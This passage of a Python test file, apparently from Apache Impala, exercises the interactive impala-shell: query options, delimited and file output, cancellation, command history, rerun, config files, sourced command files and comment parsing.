server.http_server_thread.join()
@pytest.yield_fixture
def http_503_server():
"""A fixture that creates an http server that returns a 503 http code."""
server = TestHTTPServer503(RequestHandler503)
yield server
# Cleanup after test.
shutdown_server(server)
@pytest.yield_fixture
def http_503_server_extra():
"""A fixture that creates an http server that returns a 503 http code with extra
body text."""
server = TestHTTPServer503(RequestHandler503Extra)
yield server
# Cleanup after test.
shutdown_server(server)
class TestImpalaShellInteractive(ImpalaTestSuite):
"""Test the impala shell interactively"""
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
# Run with both beeswax and HS2 to ensure that behaviour is the same.
cls.ImpalaTestMatrix.add_dimension(create_client_protocol_dimension())
def _expect_with_cmd(self, proc, cmd, vector, expectations=(), db="default"):
"""Executes a command on the expect process instance and verifies a set of
assertions defined by the expectations."""
proc.sendline(cmd + ";")
proc.expect(":{0}] {1}>".format(get_impalad_port(vector), db))
if not expectations: return
for e in expectations:
assert e in proc.before
def _wait_for_num_open_sessions(self, vector, impala_service, expected, err):
"""Helper method to wait for the number of open sessions to reach 'expected'."""
metric_name = get_open_sessions_metric(vector)
try:
actual = impala_service.wait_for_metric_value(metric_name, expected)
except AssertionError:
LOG.exception("Error: %s" % err)
raise
assert actual == expected, err
def test_local_shell_options(self, vector):
"""Test that setting the local shell options works"""
proc = spawn_shell(get_shell_cmd(vector))
proc.expect(":{0}] default>".format(get_impalad_port(vector)))
self._expect_with_cmd(proc, "set", vector,
("LIVE_PROGRESS: True", "LIVE_SUMMARY: False"))
self._expect_with_cmd(proc, "set live_progress=true", vector)
self._expect_with_cmd(proc, "set", vector,
("LIVE_PROGRESS: True", "LIVE_SUMMARY: False"))
self._expect_with_cmd(proc, "set live_summary=1", vector)
self._expect_with_cmd(proc, "set", vector,
("LIVE_PROGRESS: True", "LIVE_SUMMARY: True"))
self._expect_with_cmd(proc, "set", vector,
("WRITE_DELIMITED: False", "VERBOSE: True"))
self._expect_with_cmd(proc, "set", vector,
("DELIMITER: \\t", "OUTPUT_FILE: None"))
self._expect_with_cmd(proc, "set write_delimited=true", vector)
self._expect_with_cmd(proc, "set", vector, ("WRITE_DELIMITED: True", "VERBOSE: True"))
self._expect_with_cmd(proc, "set DELIMITER=,", vector)
self._expect_with_cmd(proc, "set", vector, ("DELIMITER: ,", "OUTPUT_FILE: None"))
self._expect_with_cmd(proc, "set output_file=/tmp/clmn.txt", vector)
self._expect_with_cmd(proc, "set", vector,
("DELIMITER: ,", "OUTPUT_FILE: /tmp/clmn.txt"))
proc.sendeof()
proc.wait()
@pytest.mark.execute_serially
def test_write_delimited(self, vector):
"""Test output rows in delimited mode"""
p = ImpalaShell(vector)
p.send_cmd("use tpch")
p.send_cmd("set write_delimited=true")
p.send_cmd("select * from nation")
result = p.get_result()
assert "+----------------+" not in result.stdout
assert "21\tVIETNAM\t2" in result.stdout, result.stdout
@pytest.mark.execute_serially
def test_change_delimiter(self, vector):
"""Test change output delimiter if delimited mode is enabled"""
p = ImpalaShell(vector)
p.send_cmd("use tpch")
p.send_cmd("set write_delimited=true")
p.send_cmd("set delimiter=,")
p.send_cmd("select * from nation")
result = p.get_result()
assert "21,VIETNAM,2" in result.stdout
@pytest.mark.execute_serially
def test_print_to_file(self, vector):
"""Test print to output file and unset"""
# test print to file
p1 = ImpalaShell(vector)
p1.send_cmd("use tpch")
local_file = NamedTemporaryFile(delete=True)
p1.send_cmd("set output_file=%s" % local_file.name)
p1.send_cmd("select * from nation")
result = p1.get_result()
assert "VIETNAM" not in result.stdout
with open(local_file.name, "r") as fi:
# check if the results were written to the file successfully
result = fi.read()
assert "VIETNAM" in result
# test unset to print back to stdout
p2 = ImpalaShell(vector)
p2.send_cmd("use tpch")
p2.send_cmd("set output_file=%s" % local_file.name)
p2.send_cmd("unset output_file")
p2.send_cmd("select * from nation")
result = p2.get_result()
assert "VIETNAM" in result.stdout
def test_compute_stats_with_live_progress_options(self, vector, unique_database):
"""Test that setting LIVE_PROGRESS options won't cause COMPUTE STATS query fail"""
p = ImpalaShell(vector)
p.send_cmd("set live_progress=True")
p.send_cmd("set live_summary=True")
table = "{0}.live_progress_option".format(unique_database)
p.send_cmd('create table {0}(col int);'.format(table))
try:
p.send_cmd('compute stats {0};'.format(table))
finally:
p.send_cmd('drop table if exists {0};'.format(table))
result = p.get_result()
assert "Updated 1 partition(s) and 1 column(s)" in result.stdout
def test_escaped_quotes(self, vector):
"""Test escaping quotes"""
# test escaped quotes outside of quotes
result = run_impala_shell_interactive(vector, "select \\'bc';")
assert "Unexpected character" in result.stderr
result = run_impala_shell_interactive(vector, "select \\\"bc\";")
assert "Unexpected character" in result.stderr
# test escaped quotes within quotes
result = run_impala_shell_interactive(vector, "select 'ab\\'c';")
assert "Fetched 1 row(s)" in result.stderr
result = run_impala_shell_interactive(vector, "select \"ab\\\"c\";")
assert "Fetched 1 row(s)" in result.stderr
@pytest.mark.execute_serially
def test_cancellation(self, vector):
impalad = ImpaladService(socket.getfqdn())
assert impalad.wait_for_num_in_flight_queries(0)
command = "select sleep(10000);"
p = ImpalaShell(vector)
p.send_cmd(command)
sleep(3)
os.kill(p.pid(), signal.SIGINT)
result = p.get_result()
assert "Cancelled" not in result.stderr
assert impalad.wait_for_num_in_flight_queries(0)
p = ImpalaShell(vector)
sleep(3)
os.kill(p.pid(), signal.SIGINT)
result = p.get_result()
assert "^C" in result.stderr
@pytest.mark.execute_serially
def test_cancellation_mid_command(self, vector):
"""Test that keyboard interrupt cancels multiline query strings"""
shell_cmd = get_shell_cmd(vector)
multiline_query = ["select column_1\n", "from table_1\n", "where ..."]
# Test keyboard interrupt mid line
child_proc = spawn_shell(shell_cmd)
child_proc.expect(PROMPT_REGEX)
for query_line in multiline_query:
child_proc.send(query_line)
child_proc.sendintr()
child_proc.expect("\^C")
child_proc.expect(PROMPT_REGEX)
child_proc.sendline('quit;')
child_proc.wait()
# Test keyboard interrupt in new line
child_proc = spawn_shell(shell_cmd)
child_proc.expect(PROMPT_REGEX)
for query_line in multiline_query:
child_proc.send(query_line)
child_proc.send("\n")
child_proc.expect(">")
child_proc.sendintr()
child_proc.expect("> \^C")
child_proc.expect(PROMPT_REGEX)
child_proc.sendline('quit;')
child_proc.wait()
def test_unicode_input(self, vector):
"Test queries containing non-ascii input"
# test a unicode query spanning multiple lines
unicode_text = u'\ufffd'
args = "select '%s'\n;" % unicode_text.encode('utf-8')
result = run_impala_shell_interactive(vector, args)
assert "Fetched 1 row(s)" in result.stderr
def test_welcome_string(self, vector):
"""Test that the shell's welcome message is only printed once
when the shell is started. Ensure it is not reprinted on errors.
Regression test for IMPALA-1153
"""
result = run_impala_shell_interactive(vector, 'asdf;')
assert result.stdout.count("Welcome to the Impala shell") == 1
result = run_impala_shell_interactive(vector, 'select * from non_existent_table;')
assert result.stdout.count("Welcome to the Impala shell") == 1
def test_disconnected_shell(self, vector):
"""Test that the shell presents a disconnected prompt if it can't connect
"""
result = run_impala_shell_interactive(vector, 'asdf;', shell_args=['-ifoo'],
wait_until_connected=False)
assert ImpalaShellClass.DISCONNECTED_PROMPT in result.stdout, result.stderr
def test_quit_no_reconnect(self, vector):
"""Test that a disconnected shell does not try to reconnect if quitting"""
result = run_impala_shell_interactive(vector, 'quit;', shell_args=['-ifoo'],
wait_until_connected=False)
assert "reconnect" not in result.stderr
result = run_impala_shell_interactive(vector, 'exit;', shell_args=['-ifoo'],
wait_until_connected=False)
assert "reconnect" not in result.stderr
# Null case: This is not quitting, so it will result in an attempt to reconnect.
result = run_impala_shell_interactive(vector, 'show tables;', shell_args=['-ifoo'],
wait_until_connected=False)
assert "reconnect" in result.stderr
def test_bash_cmd_timing(self, vector):
"""Test existence of time output in bash commands run from shell"""
args = ["! ls;"]
result = run_impala_shell_interactive(vector, args)
assert "Executed in" in result.stderr
@SkipIfLocal.multiple_impalad
@pytest.mark.execute_serially
def test_reconnect(self, vector):
"""Regression Test for IMPALA-1235
Verifies that a connect command by the user is honoured.
"""
try:
# Disconnect existing clients so there are no open sessions.
self.close_impala_clients()
hostname = socket.getfqdn()
initial_impala_service = ImpaladService(hostname)
target_impala_service = ImpaladService(hostname, webserver_port=25001,
beeswax_port=21001, hs2_port=21051, hs2_http_port=28001)
protocol = vector.get_value("protocol").lower()
if protocol == "hs2":
target_port = 21051
elif protocol == "hs2-http":
target_port = 28001
else:
assert protocol == "beeswax"
target_port = 21001
# This test is running serially, so there shouldn't be any open sessions, but wait
# here in case a session from a previous test hasn't been fully closed yet.
self._wait_for_num_open_sessions(vector, initial_impala_service, 0,
"first impalad should not have any remaining open sessions.")
self._wait_for_num_open_sessions(vector, target_impala_service, 0,
"second impalad should not have any remaining open sessions.")
# Connect to the first impalad
p = ImpalaShell(vector)
# Make sure we're connected <hostname>:<port>
self._wait_for_num_open_sessions(vector, initial_impala_service, 1,
"Not connected to %s:%d" % (hostname, get_impalad_port(vector)))
p.send_cmd("connect %s:%d" % (hostname, target_port))
# The number of sessions on the target impalad should have been incremented.
self._wait_for_num_open_sessions(vector,
target_impala_service, 1, "Not connected to %s:%d" % (hostname, target_port))
assert "[%s:%d] default>" % (hostname, target_port) in p.get_result().stdout
# The number of sessions on the initial impalad should have been decremented.
self._wait_for_num_open_sessions(vector, initial_impala_service, 0,
"Connection to %s:%d should have been closed" % (
hostname, get_impalad_port(vector)))
finally:
self.create_impala_clients()
@pytest.mark.execute_serially
def test_ddl_queries_are_closed(self, vector):
"""Regression test for IMPALA-1317
The shell does not call close() for alter, use and drop queries, leaving them in
flight. This test issues those queries in interactive mode, and checks the debug
webpage to confirm that they've been closed.
TODO: Add every statement type.
"""
# IMPALA-10312: deflake the test by increasing timeout above the default
TIMEOUT_S = 30
# Disconnect existing clients so there are no open sessions.
self.close_impala_clients()
TMP_DB = 'inflight_test_db'
TMP_TBL = 'tmp_tbl'
MSG = '%s query should be closed'
NUM_QUERIES = 'impala-server.num-queries'
impalad = ImpaladService(socket.getfqdn())
self._wait_for_num_open_sessions(vector, impalad, 0,
"Open sessions found after closing all clients.")
p = ImpalaShell(vector)
try:
start_num_queries = impalad.get_metric_value(NUM_QUERIES)
p.send_cmd('create database if not exists %s' % TMP_DB)
p.send_cmd('use %s' % TMP_DB)
impalad.wait_for_metric_value(NUM_QUERIES, start_num_queries + 2)
assert impalad.wait_for_num_in_flight_queries(0, TIMEOUT_S), MSG % 'use'
p.send_cmd('create table %s(i int)' % TMP_TBL)
p.send_cmd('alter table %s add columns (j int)' % TMP_TBL)
impalad.wait_for_metric_value(NUM_QUERIES, start_num_queries + 4)
assert impalad.wait_for_num_in_flight_queries(0, TIMEOUT_S), MSG % 'alter'
p.send_cmd('drop table %s' % TMP_TBL)
impalad.wait_for_metric_value(NUM_QUERIES, start_num_queries + 5)
assert impalad.wait_for_num_in_flight_queries(0, TIMEOUT_S), MSG % 'drop'
finally:
# get_result() must be called to exit the shell.
p.get_result()
self._wait_for_num_open_sessions(vector, impalad, 0,
"shell should close sessions.")
run_impala_shell_interactive(vector, "drop table if exists %s.%s;" % (
TMP_DB, TMP_TBL))
run_impala_shell_interactive(vector, "drop database if exists foo;")
self.create_impala_clients()
def test_multiline_queries_in_history(self, vector, tmp_history_file):
"""Test to ensure that multiline queries with comments are preserved in history
Ensure that multiline queries are preserved when they're read back from history.
Additionally, also test that comments are preserved.
"""
# readline gets its input from tty, so using stdin does not work.
child_proc = spawn_shell(get_shell_cmd(vector))
# List of (input query, expected text in output).
# The expected output is usually the same as the input with a number prefix, except
# where the shell strips newlines before a semicolon.
queries = [
("select\n1;--comment", "[1]: select\n1;--comment"),
("select 1 --comment\n;", "[2]: select 1 --comment;"),
("select 1 --comment\n\n\n;", "[3]: select 1 --comment;"),
("select /*comment*/\n1;", "[4]: select /*comment*/\n1;"),
("select\n/*comm\nent*/\n1;", "[5]: select\n/*comm\nent*/\n1;")]
for query, _ in queries:
child_proc.expect(PROMPT_REGEX)
child_proc.sendline(query)
child_proc.expect("Fetched 1 row\(s\) in [0-9]+\.?[0-9]*s")
child_proc.expect(PROMPT_REGEX)
child_proc.sendline('quit;')
child_proc.wait()
p = ImpalaShell(vector)
p.send_cmd('history')
result = p.get_result()
for _, history_entry in queries:
assert history_entry in result.stderr, "'%s' not in '%s'" % (history_entry,
result.stderr)
def test_history_does_not_duplicate_on_interrupt(self, vector, tmp_history_file):
"""This test verifies that once the cmdloop is broken the history file will not be
re-read. The cmdloop can be broken when the user sends a SIGINT or exceptions
occur."""
# readline gets its input from tty, so using stdin does not work.
shell_cmd = get_shell_cmd(vector)
child_proc = spawn_shell(shell_cmd)
# initialize history
child_proc.expect(PROMPT_REGEX)
child_proc.sendline("select 1;")
child_proc.expect("Fetched 1 row\(s\) in [0-9]+\.?[0-9]*s")
child_proc.expect(PROMPT_REGEX)
child_proc.sendline("quit;")
child_proc.wait()
# create a new shell and send SIGINT
child_proc = spawn_shell(shell_cmd)
child_proc.expect(PROMPT_REGEX)
child_proc.sendintr()
child_proc.expect("\^C")
child_proc.sendline("select 2;")
child_proc.expect("Fetched 1 row\(s\) in [0-9]+\.?[0-9]*s")
child_proc.expect(PROMPT_REGEX)
child_proc.sendline("quit;")
child_proc.wait()
# check history in a new shell instance
p = ImpalaShell(vector)
p.send_cmd('history')
result = p.get_result().stderr.splitlines()
assert "[1]: select 1;" == result[1]
assert "[2]: quit;" == result[2]
assert "[3]: select 2;" == result[3]
assert "[4]: quit;" == result[4]
def test_history_file_option(self, vector, tmp_history_file):
"""
Setting the 'tmp_history_file' fixture above means that the IMPALA_HISTFILE
environment will be overridden. Here we override that environment by passing
the --history_file command line option, ensuring that the history ends up
in the appropriate spot.
"""
with NamedTemporaryFile() as new_hist:
shell_cmd = get_shell_cmd(vector) + ["--history_file=%s" % new_hist.name]
child_proc = spawn_shell(shell_cmd)
child_proc.expect(":{0}] default>".format(get_impalad_port(vector)))
self._expect_with_cmd(child_proc, "select 'hi'", vector, ('hi'))
child_proc.sendline('exit;')
child_proc.expect(pexpect.EOF)
history_contents = file(new_hist.name).read()
assert "select 'hi'" in history_contents
def test_rerun(self, vector, tmp_history_file):
"""Smoke test for the 'rerun' command"""
child_proc = spawn_shell(get_shell_cmd(vector))
child_proc.expect(":{0}] default>".format(get_impalad_port(vector)))
self._expect_with_cmd(child_proc, "@1", vector, ("Command index out of range"))
self._expect_with_cmd(child_proc, "rerun -1", vector,
("Command index out of range"))
self._expect_with_cmd(child_proc, "select 'first_command'", vector,
("first_command"))
self._expect_with_cmd(child_proc, "rerun 1", vector, ("first_command"))
self._expect_with_cmd(child_proc, "@ -1", vector, ("first_command"))
self._expect_with_cmd(child_proc, "select 'second_command'", vector,
("second_command"))
child_proc.sendline('history;')
child_proc.expect(":{0}] default>".format(get_impalad_port(vector)))
assert '[1]: select \'first_command\';' in child_proc.before
assert '[2]: select \'second_command\';' in child_proc.before
assert '[3]: history;' in child_proc.before
# Rerunning command should not add an entry into history.
assert '[4]' not in child_proc.before
self._expect_with_cmd(child_proc, "@0", vector, ("Command index out of range"))
self._expect_with_cmd(child_proc, "rerun 4", vector, ("Command index out of range"))
self._expect_with_cmd(child_proc, "@-4", vector, ("Command index out of range"))
self._expect_with_cmd(child_proc, " @ 3 ", vector, ("second_command"))
self._expect_with_cmd(child_proc, "@-3", vector, ("first_command"))
self._expect_with_cmd(child_proc, "@", vector,
("Command index to be rerun must be an integer."))
self._expect_with_cmd(child_proc, "@1foo", vector,
("Command index to be rerun must be an integer."))
self._expect_with_cmd(child_proc, "@1 2", vector,
("Command index to be rerun must be an integer."))
self._expect_with_cmd(child_proc, "rerun1", vector, ("Syntax error"))
child_proc.sendline('quit;')
child_proc.wait()
def test_tip(self, vector):
"""Smoke test for the TIP command"""
# Temporarily add impala_shell module to path to get at TIPS list for verification
sys.path.append("%s/shell/" % os.environ['IMPALA_HOME'])
try:
import impala_shell
finally:
sys.path = sys.path[:-1]
result = run_impala_shell_interactive(vector, "tip;")
for t in impala_shell.TIPS:
if t in result.stderr: return
assert False, "No tip found in output %s" % result.stderr
def test_var_substitution(self, vector):
cmds = open(os.path.join(QUERY_FILE_PATH, 'test_var_substitution.sql')).read()
args = ["--var=foo=123", "--var=BAR=456", "--delimited", "--output_delimiter= "]
result = run_impala_shell_interactive(vector, cmds, shell_args=args)
assert_var_substitution(result)
def test_query_option_configuration(self, vector):
rcfile_path = os.path.join(QUERY_FILE_PATH, 'impalarc_with_query_options')
args = ['-Q', 'MT_dop=1', '--query_option=MAX_ERRORS=200',
'--config_file=%s' % rcfile_path]
cmds = "set all;"
result = run_impala_shell_interactive(vector, cmds, shell_args=args)
assert "\tMT_DOP: 1" in result.stdout
assert "\tMAX_ERRORS: 200" in result.stdout
assert "\tEXPLAIN_LEVEL: 2" in result.stdout
assert "INVALID_QUERY_OPTION is not supported for the impalad being connected to, "\
"ignoring." in result.stdout
# Verify that query options under [impala] override those under [impala.query_options]
assert "\tDEFAULT_FILE_FORMAT: avro" in result.stdout
def test_commandline_flag_disable_live_progress(self, vector):
"""Test the command line flag disable_live_progress with live_progress."""
# By default, shell option live_progress is set to True in the interactive mode.
cmds = "set all;"
result = run_impala_shell_interactive(vector, cmds)
assert "\tLIVE_PROGRESS: True" in result.stdout
# override the default option through command line argument.
args = ['--disable_live_progress']
result = run_impala_shell_interactive(vector, cmds, shell_args=args)
assert "\tLIVE_PROGRESS: False" in result.stdout
# set live_progress as True with config file.
# override the option in config file through command line argument.
rcfile_path = os.path.join(QUERY_FILE_PATH, 'good_impalarc3')
args = ['--disable_live_progress', '--config_file=%s' % rcfile_path]
result = run_impala_shell_interactive(vector, cmds, shell_args=args)
assert "\tLIVE_PROGRESS: False" in result.stdout
def test_live_option_configuration(self, vector):
"""Test the optional configuration file with live_progress and live_summary."""
# Positive tests
# set live_summary and live_progress as True with config file
rcfile_path = os.path.join(QUERY_FILE_PATH, 'good_impalarc3')
cmd_line_args = ['--config_file=%s' % rcfile_path]
cmds = "set all;"
result = run_impala_shell_interactive(vector, cmds, shell_args=cmd_line_args)
assert 'WARNING:' not in result.stderr, \
"A valid config file should not trigger any warning: {0}".format(result.stderr)
assert "\tLIVE_SUMMARY: True" in result.stdout
assert "\tLIVE_PROGRESS: True" in result.stdout
# set live_summary and live_progress as False with config file
rcfile_path = os.path.join(QUERY_FILE_PATH, 'good_impalarc4')
args = ['--config_file=%s' % rcfile_path]
result = run_impala_shell_interactive(vector, cmds, shell_args=args)
assert 'WARNING:' not in result.stderr, \
"A valid config file should not trigger any warning: {0}".format(result.stderr)
assert "\tLIVE_SUMMARY: False" in result.stdout
assert "\tLIVE_PROGRESS: False" in result.stdout
# override options in config file through command line arguments
args = ['--live_progress', '--live_summary', '--config_file=%s' % rcfile_path]
result = run_impala_shell_interactive(vector, cmds, shell_args=args)
assert "\tLIVE_SUMMARY: True" in result.stdout
assert "\tLIVE_PROGRESS: True" in result.stdout
def test_source_file(self, vector):
cwd = os.getcwd()
try:
# Change working dir so that SOURCE command in shell.cmds can find shell2.cmds.
os.chdir("%s/tests/shell/" % os.environ['IMPALA_HOME'])
# IMPALA-5416: Test that a command following 'source' won't be run twice.
result = run_impala_shell_interactive(vector, "source shell.cmds;select \"second "
"command\";")
assert "Query: USE FUNCTIONAL" in result.stderr
assert "Query: SHOW TABLES" in result.stderr
assert "alltypes" in result.stdout
# This is from shell2.cmds, the result of sourcing a file from a sourced file.
assert "SELECT VERSION()" in result.stderr
assert "version()" in result.stdout
assert len(re.findall("'second command'", result.stdout)) == 1
# IMPALA-5416: Test that two source commands on a line won't crash the shell.
result = run_impala_shell_interactive(
vector, "source shell.cmds;source shell.cmds;")
assert len(re.findall("version\(\)", result.stdout)) == 2
finally:
os.chdir(cwd)
def test_source_file_with_errors(self, vector):
full_path = "%s/tests/shell/shell_error.cmds" % os.environ['IMPALA_HOME']
result = run_impala_shell_interactive(vector, "source %s;" % full_path)
assert "Could not execute command: USE UNKNOWN_DATABASE" in result.stderr
assert "Query: USE FUNCTIONAL" not in result.stderr
result = run_impala_shell_interactive(vector, "source %s;" % full_path, ['-c'])
assert "Could not execute command: USE UNKNOWN_DATABASE" in result.stderr,\
result.stderr
assert "Query: USE FUNCTIONAL" in result.stderr, result.stderr
assert "Query: SHOW TABLES" in result.stderr, result.stderr
assert "alltypes" in result.stdout, result.stdout
def test_source_missing_file(self, vector):
full_path = "%s/tests/shell/doesntexist.cmds" % os.environ['IMPALA_HOME']
result = run_impala_shell_interactive(vector, "source %s;" % full_path)
assert "No such file or directory" in result.stderr
def test_zero_row_fetch(self, vector):
# IMPALA-4418: DROP and USE are generally exceptional statements where
# the client does not fetch. For statements returning 0 rows we do not
# want an empty line in stdout.
result = run_impala_shell_interactive(vector, "-- foo \n use default;")
assert re.search('> \[', result.stdout)
result = run_impala_shell_interactive(vector,
"select * from functional.alltypes limit 0;")
assert "Fetched 0 row(s)" in result.stderr
assert re.search('> \[', result.stdout)
def test_set_and_set_all(self, vector):
"""IMPALA-2181. Tests the outputs of SET and SET ALL commands. SET should contain the
REGULAR and ADVANCED options only. SET ALL should contain all the options grouped by
display level."""
shell1 = ImpalaShell(vector)
shell1.send_cmd("set")
result = shell1.get_result()
assert "Query options (defaults shown in []):" in result.stdout
assert "ABORT_ON_ERROR" in result.stdout
assert "Advanced Query Options:" in result.stdout
assert "APPX_COUNT_DISTINCT" in result.stdout
assert vector.get_value("protocol") in ("hs2", "hs2-http")\
or "SUPPORT_START_OVER" in result.stdout
# Development, deprecated and removed options should not be shown.
# Note: there are currently no deprecated options
assert "Development Query Options:" not in result.stdout
assert "DEBUG_ACTION" not in result.stdout # Development option.
assert "MAX_IO_BUFFERS" not in result.stdout # Removed option.
shell2 = ImpalaShell(vector)
shell2.send_cmd("set all")
result = shell2.get_result()
assert "Query options (defaults shown in []):" in result.stdout
assert "Advanced Query Options:" in result.stdout
assert "Development Query Options:" in result.stdout
assert "Deprecated Query Options:" not in result.stdout
advanced_part_start_idx = result.stdout.find("Advanced Query Options")
development_part_start_idx = result.stdout.find("Development Query Options")
deprecated_part_start_idx = result.stdout.find("Deprecated Query Options")
advanced_part = result.stdout[advanced_part_start_idx:development_part_start_idx]
development_part = result.stdout[development_part_start_idx:deprecated_part_start_idx]
assert "ABORT_ON_ERROR" in result.stdout[:advanced_part_start_idx]
assert "APPX_COUNT_DISTINCT" in advanced_part
assert vector.get_value("protocol") in ("hs2", "hs2-http")\
or "SUPPORT_START_OVER" in advanced_part
assert "DEBUG_ACTION" in development_part
# Removed options should not be shown.
assert "MAX_IO_BUFFERS" not in result.stdout
def check_command_case_sensitivity(self, vector, command, expected):
shell = ImpalaShell(vector)
shell.send_cmd(command)
assert expected in shell.get_result().stderr
def test_unexpected_conversion_for_literal_string_to_lowercase(self, vector):
# IMPALA-4664: Impala shell can accidentally convert certain literal
# strings to lowercase. Impala shell splits each command into tokens
# and then converts the first token to lowercase to figure out how it
# should execute the command. The splitting is done by spaces only.
# Thus, if the user types a TAB after the SELECT, the first token after
# the split becomes the SELECT plus whatever comes after it.
result = run_impala_shell_interactive(vector, "select'MUST_HAVE_UPPER_STRING'")
assert re.search('MUST_HAVE_UPPER_STRING', result.stdout)
result = run_impala_shell_interactive(vector, "select\t'MUST_HAVE_UPPER_STRING'")
assert re.search('MUST_HAVE_UPPER_STRING', result.stdout)
result = run_impala_shell_interactive(vector, "select\n'MUST_HAVE_UPPER_STRING'")
assert re.search('MUST_HAVE_UPPER_STRING', result.stdout)
def test_case_sensitive_command(self, vector):
# IMPALA-2640: Make a given command case-sensitive
cwd = os.getcwd()
try:
self.check_command_case_sensitivity(vector, "sElEcT VERSION()", "Query: sElEcT")
self.check_command_case_sensitivity(vector, "sEt VaR:FoO=bOo", "Variable FOO")
self.check_command_case_sensitivity(vector, "sHoW tables", "Query: sHoW")
# Change working dir so that SOURCE command in shell_case_sensitive.cmds can
# find shell_case_sensitive2.cmds.
os.chdir("%s/tests/shell/" % os.environ['IMPALA_HOME'])
result = run_impala_shell_interactive(vector,
"sOuRcE shell_case_sensitive.cmds; SeLeCt 'second command'")
print result.stderr
assert "Query: uSe FUNCTIONAL" in result.stderr
assert "Query: ShOw TABLES" in result.stderr
assert "alltypes" in result.stdout
# This is from shell_case_sensitive2.cmds, the result of sourcing a file
# from a sourced file.
print result.stderr
assert "SeLeCt 'second command'" in result.stderr
finally:
os.chdir(cwd)
def test_line_with_leading_comment(self, vector, unique_database):
# IMPALA-2195: A line with a comment produces incorrect command.
table = "{0}.leading_comment".format(unique_database)
run_impala_shell_interactive(vector, 'create table {0} (i int);'.format(table))
result = run_impala_shell_interactive(vector, '-- comment\n'
'insert into {0} values(1);'.format(table))
assert 'Modified 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '-- comment\n'
'select * from {0};'.format(table))
assert 'Fetched 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '--한글\n'
'select * from {0};'.format(table))
assert 'Fetched 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '/* 한글 */\n'
'select * from {0};'.format(table))
assert 'Fetched 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '/* comment */\n'
'select * from {0};'.format(table))
assert 'Fetched 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '/* comment1 */\n'
'-- comment2\n'
'select * from {0};'.format(table))
assert 'Fetched 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '/* comment1\n'
'comment2 */ select * from {0};'.format(table))
assert 'Fetched 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '/* select * from {0} */ '
'select * from {0};'.format(table))
assert 'Fetched 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '/* comment */ help use')
assert 'Executes a USE... query' in result.stdout
result = run_impala_shell_interactive(vector, '-- comment\n'
' help use;')
assert 'Executes a USE... query' in result.stdout
result = run_impala_shell_interactive(vector, '/* comment1 */\n'
'-- comment2\n'
'desc {0};'.format(table))
assert 'Fetched 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '/* comment1 */\n'
'-- comment2\n'
'help use;')
assert 'Executes a USE... query' in result.stdout
def test_line_ends_with_comment(self, vector):
# IMPALA-5269: Test lines that end with a comment.
queries = ['select 1 + 1; --comment',
'select 1 + 1 --comment\n;']
for query in queries:
result = run_impala_shell_interactive(vector, query)
assert '| 1 + 1 |' in result.stdout
assert '| 2 |' in result.stdout
queries = ['select \'some string\'; --comment',
'select \'some string\' --comment\n;']
for query in queries:
result = run_impala_shell_interactive(vector, query)
assert '| \'some string\' |' in result.stdout
assert '| some string |' in result.stdout
queries = ['select "--"; -- "--"',
'select \'--\'; -- "--"',
'select "--" -- "--"\n;',
'select \'--\' -- "--"\n;']
for query in queries:
result = run_impala_shell_interactive(vector, query)
assert '| \'--\' |' in result.stdout
assert '| -- |' in result.stdout
query = ('select * from (\n' +
'select count(*) from functional.alltypes\n' +
') v; -- Incomplete SQL statement in this line')
result = run_impala_shell_interactive(vector, query)
assert '| count(*) |' in result.stdout
query = ('select id from functional.alltypes\n' +
'order by id; /*\n' +
'* Multi-line comment\n' +
'*/')
result = run_impala_shell_interactive(vector, query)
assert '| id |' in result.stdout
def test_fix_infinite_loop(self, vector):
# IMPALA-6337: Fix infinite loop.
# In case of TL;DR:
# - see IMPALA-9362 for details
# - see tests/shell/util.py for explanation of IMPALA_SHELL_EXECUTABLE
if os.getenv("IMPALA_HOME") not in IMPALA_SHELL_EXECUTABLE:
# The fix for IMPALA-6337 involved patching our internal verison of
# sqlparse 0.1.19 in ${IMPALA_HOME}/shell/ext-py. However, when we
# create the the stand-alone python package of the impala-shell for PyPI,
# we don't include the bundled 3rd party libs -- we expect users to
# install 3rd upstream libraries from PyPI.
#
# We could try to bundle sqlparse with the PyPI package, but there we
# run into the issue that the our bundled version is not python 3
# compatible. The real fix for this would be to upgrade to sqlparse 0.3.0,
# but that's not without complications. See IMPALA-9362 for details.
#
# For the time being, what this means is that IMPALA-6337 is fixed for
# people who are running the shell locally from any host/node that's part
# of a cluster where Impala is installed, but if they are running a
# standalone version of the shell on a client outside of a cluster, then
# they will still be relying on the upstream version of sqlparse 0.1.19,
# and so they may still be affected by the IMPALA-6337.
#
pytest.skip("Test will fail if shell is not part of dev environment.")
result = run_impala_shell_interactive(vector, "select 1 + 1; \"\n;\";")
assert '| 2 |' in result.stdout
result = run_impala_shell_interactive(vector, "select '1234'\";\n;\n\";")
assert '| 1234 |' in result.stdout
result = run_impala_shell_interactive(vector, "select 1 + 1; \"\n;\"\n;")
assert '| 2 |' in result.stdout
result = run_impala_shell_interactive(vector, "select '1\\'23\\'4'\";\n;\n\";")
assert '| 1\'23\'4 |' in result.stdout
result = run_impala_shell_interactive(vector, "select '1\"23\"4'\";\n;\n\";")
assert '| 1"23"4 |' in result.stdout
def test_comment_with_quotes(self, vector):
# IMPALA-2751: Comment does not need to have matching quotes
queries = [
"select -- '\n1;",
'select -- "\n1;',
"select -- \"'\n 1;",
"select /*'\n*/ 1;",
'select /*"\n*/ 1;',
"select /*\"'\n*/ 1;",
"with a as (\nselect 1\n-- '\n) select * from a",
'with a as (\nselect 1\n-- "\n) select * from a',
"with a as (\nselect 1\n-- '\"\n) select * from a",
]
for query in queries:
result = run_impala_shell_interactive(vector, query)
assert '| 1 |' in result.stdout
def test_shell_prompt(self, vector):
shell_cmd = get_shell_cmd(vector)
proc = spawn_shell(shell_cmd)
proc.expect(":{0}] default>".format(get_impalad_port(vector)))
self._expect_with_cmd(proc, "use foo", vector, (), 'default')
self._expect_with_cmd(proc, "use functional", vector, (), 'functional')
self._expect_with_cmd(proc, "use foo", vector, (), 'functional')
self._expect_with_cmd(proc, 'use `tpch`', vector, (), 'tpch')
